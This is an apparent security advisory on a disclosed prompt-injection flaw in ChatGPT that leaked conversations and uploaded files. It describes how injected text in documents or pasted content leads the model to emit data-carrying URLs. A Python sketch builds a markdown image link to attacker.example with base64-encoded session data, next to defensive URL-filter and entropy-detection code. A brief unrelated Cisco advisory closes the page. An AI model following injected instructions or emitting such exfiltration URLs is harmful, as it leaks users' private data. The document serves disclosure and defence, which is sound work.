Key Takeaway
Check Point Research disclosed a prompt injection vulnerability in OpenAI ChatGPT that allowed a single malicious prompt to silently exfiltrate user messages, uploaded files, and other session data without user knowledge. The flaw requires no authentication beyond a standard ChatGPT session and carries low attack complexity. Organizations should restrict file uploads, avoid using ChatGPT for sensitive data processing, and monitor OpenAI's security advisories for patch confirmation.
ChatGPT Vulnerability Allowed Silent Exfiltration of Conversations and Uploaded Files
Affected Product: OpenAI ChatGPT (web and potentially API-accessible interfaces)
Vulnerability Type: Prompt Injection / Covert Data Exfiltration
Researcher: Check Point Research
CVE Status: Not yet assigned at time of publication
Vulnerability Overview
Check Point Research disclosed a previously unknown vulnerability in OpenAI's ChatGPT that allowed a malicious prompt to silently exfiltrate sensitive user data — including conversation history and uploaded files — without the user's knowledge or consent.
The flaw is classified as a prompt injection attack. In this attack class, adversarial instructions embedded in user-supplied or third-party content manipulate the model into executing unintended actions. In this case, a single crafted prompt was sufficient to transform a normal ChatGPT session into a covert exfiltration channel.
According to Check Point, the attack could leak:
- User messages from the active conversation
- Uploaded files submitted during the session
- Other sensitive session content present in the model's context window
No CVE identifier has been publicly assigned as of this writing. CVSS scoring has not been published, though the attack vector is network-based, requires no authentication beyond initiating a ChatGPT session, and carries low attack complexity — factors that would typically place it in the high-severity range.
Technical Detail
Prompt injection against large language models (LLMs) exploits the model's inability to reliably distinguish between legitimate system instructions and adversarial instructions injected through user input or retrieved content. When ChatGPT processes a malicious prompt — whether typed directly or embedded in a document the user uploads — the model can be instructed to encode and transmit context-window data to an attacker-controlled endpoint.
The exfiltration mechanism likely leverages the model's ability to generate URLs or make references that, when rendered or followed by a browser or plugin, send data outbound. This technique has been demonstrated in prior research against other LLM-integrated tools, but Check Point's findings apply it specifically to ChatGPT's handling of uploaded files and multi-turn conversations.
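As an illustration of this pattern, the sketch below shows how injected instructions could direct a model to embed context data in an image URL that a client renders automatically. The domain `attacker.example`, the path, and the `q` parameter are hypothetical; this is not OpenAI's confirmed mechanism, only the generic technique described above.

```python
import base64
from urllib.parse import quote

def build_exfil_markdown(context_data: str) -> str:
    """Encode session data into a markdown image URL, the way an
    injected prompt might instruct a model to. Rendering the image
    triggers an outbound GET request carrying the payload."""
    payload = base64.urlsafe_b64encode(context_data.encode()).decode()
    return f"![loading](https://attacker.example/pixel.png?q={quote(payload)})"

# The attacker's server recovers the data from the query string.
md = build_exfil_markdown("user uploaded: q3_financials.xlsx")
print(md)
```

The key property is that no click is needed: a markdown renderer that fetches images completes the request on the user's behalf.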
The attack requires no elevated privileges and no vulnerability in the underlying operating system or browser. The user does not need to click a link or install anything. The malicious prompt does the work inside the model's inference loop.
Real-World Impact
Organizations that permit employees to use ChatGPT for work tasks — reviewing contracts, drafting code, analyzing documents — face direct exposure. A user who uploads a sensitive file (financial data, source code, personally identifiable information, legal documents) and then encounters a malicious prompt in the same session could have that content exfiltrated transparently.
Attack delivery vectors include:
- Malicious documents uploaded by the user — a PDF or DOCX containing injected instructions
- Adversarial content pasted into the chat — copied from a compromised webpage or email
- Shared conversation links — if a crafted conversation is shared with a target user
Enterprises using ChatGPT via the API in automated pipelines face additional risk, as injected instructions in processed third-party content could exfiltrate data at scale without any human reviewing the output.
This class of vulnerability is particularly damaging in environments where ChatGPT has been integrated with tools, plugins, or retrieval-augmented generation (RAG) pipelines, since the model may have access to a broader data surface than a standalone chat session.
OpenAI Response
Check Point reported the vulnerability to OpenAI through responsible disclosure. OpenAI has acknowledged the report. Specific patch details, timeline, and confirmation of remediation were not publicly available at the time of this writing. Organizations should monitor OpenAI's security advisories at security.openai.com for updates.
Mitigation and Recommended Actions
For enterprises and security teams:
- Restrict file uploads — Disable or limit ChatGPT file upload functionality for employees through OpenAI's administrative controls until full remediation is confirmed.
- Enforce ChatGPT Enterprise data controls — If using ChatGPT Enterprise, verify that conversation data retention and training opt-outs are configured per your data handling policies.
- Block ChatGPT access for sensitive workflows — Do not use consumer ChatGPT interfaces for processing confidential documents, PII, source code, or legally privileged material.
- Audit LLM integration pipelines — Review any automated workflows that pass third-party content into ChatGPT or any other LLM. Treat all retrieved or user-supplied content as potentially adversarial.
- Apply output filtering — Where ChatGPT output is processed programmatically, implement output validation to detect anomalous URL generation or encoded data patterns that may indicate exfiltration attempts.
- Monitor for CVE assignment — Track the National Vulnerability Database (NVD) and OpenAI's disclosure channels for an official CVE ID and associated patch guidance.
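The output-filtering recommendation above can be sketched as a simple URL check over model output. The allowlist, regex, and length threshold here are illustrative assumptions that would need tuning per environment, not a production-ready filter.

```python
import re
from urllib.parse import urlparse, parse_qs

# Example allowlist of hosts the model is expected to reference.
ALLOWED_HOSTS = {"openai.com", "docs.example.com"}
URL_RE = re.compile(r"https?://[^\s)\"'>]+")

def flag_suspicious_urls(model_output: str, max_param_len: int = 64) -> list[str]:
    """Return URLs in model output whose host is not allowlisted or
    whose query parameters are long enough to smuggle encoded data."""
    flagged = []
    for url in URL_RE.findall(model_output):
        parsed = urlparse(url)
        host_ok = parsed.hostname in ALLOWED_HOSTS
        long_params = any(
            len(v) > max_param_len
            for values in parse_qs(parsed.query).values()
            for v in values
        )
        if not host_ok or long_params:
            flagged.append(url)
    return flagged
```

A filter like this would sit between the model and any renderer or downstream consumer, quarantining output rather than silently fetching embedded resources.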
For SOC analysts:
Flag outbound HTTP requests originating from browser sessions to unrecognized or newly registered domains immediately following ChatGPT usage. Prompt injection exfiltration typically generates anomalous GET requests with encoded query parameters carrying conversation data.
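One way to approximate this triage over proxy or DNS logs is an entropy check on query parameters: encoded conversation data tends to be long and high-entropy, while ordinary parameters are short and structured. The base64-like pattern and thresholds below are illustrative assumptions, not a validated detection rule.

```python
import math
import re
from collections import Counter
from urllib.parse import urlparse, parse_qsl

# Matches values that look like base64/urlsafe-base64 payloads of
# meaningful length. 40 chars is an arbitrary illustrative floor.
B64ISH = re.compile(r"^[A-Za-z0-9+/_=-]{40,}$")

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character, estimated from frequency counts."""
    counts = Counter(s)
    return -sum((c / len(s)) * math.log2(c / len(s)) for c in counts.values())

def is_suspect_request(url: str, entropy_threshold: float = 4.0) -> bool:
    """True if any query parameter is base64-like and high-entropy,
    a common signature of data smuggled through a GET request."""
    for _, value in parse_qsl(urlparse(url).query):
        if B64ISH.match(value) and shannon_entropy(value) > entropy_threshold:
            return True
    return False
```

In practice this heuristic would be combined with domain-age and reputation signals, since legitimate services also pass encoded tokens in query strings.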
Check Point's full technical write-up is expected to include proof-of-concept detail. Security teams should treat this disclosure as active risk until OpenAI confirms a complete fix is deployed across all affected surfaces.
Original Source
The Hacker News
Cisco has patched CVE-2026-20093, a critical authentication bypass vulnerability in the Cisco Integrated Management Controller (IMC) with a CVSS score of 9.8. An unauthenticated remote attacker can exploit the flaw to bypass authentication and gain elevated privileges over affected hardware management interfaces. Administrators should apply Cisco's patch immediately and restrict IMC network access to isolated management VLANs.